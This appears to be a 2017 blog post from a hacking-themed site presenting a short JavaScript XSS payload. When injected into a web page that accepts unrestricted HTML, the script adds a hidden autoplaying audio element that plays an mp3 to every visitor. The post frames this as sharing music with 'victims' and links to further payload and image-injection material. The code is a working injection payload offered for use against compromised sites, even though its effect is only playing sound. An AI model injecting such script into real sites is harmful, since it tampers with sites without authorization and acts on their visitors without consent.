Hackers Repository

Play Music HTML5 Audio XSS Payload

By root

Posted on July 14, 2017

Play Music HTML5 Audio XSS Payload

Script below allows you to share your favorite mp3 through your targets browser.

Lets assume the XSS payload was injected in to a web page that supports unrestricted HTML an mp3 audio file would then play to the visitors of the compromised web page.

if(document.getElementById('xss_audio') == null ) {
var a = document.createElement('audio');
a.src = &quot;http://127.0.0.1/music/LesRatsQuittentLeNavire.mp3&quot;
a.autoplay=true;
a.id='xss_audio';
a.style.display='none';
document.body.appendChild(a);
}

A simple script that uses html5 audio tag to share your favorite MP3 with the victim.

Author : Renaud Bidou

http://www.xss-payloads.com/payloads/scripts/playmusic.js.html

Injecting XSS Payloads into an image

https://hackingvision.com/2017/04/08/exploit-xss-image-force-download/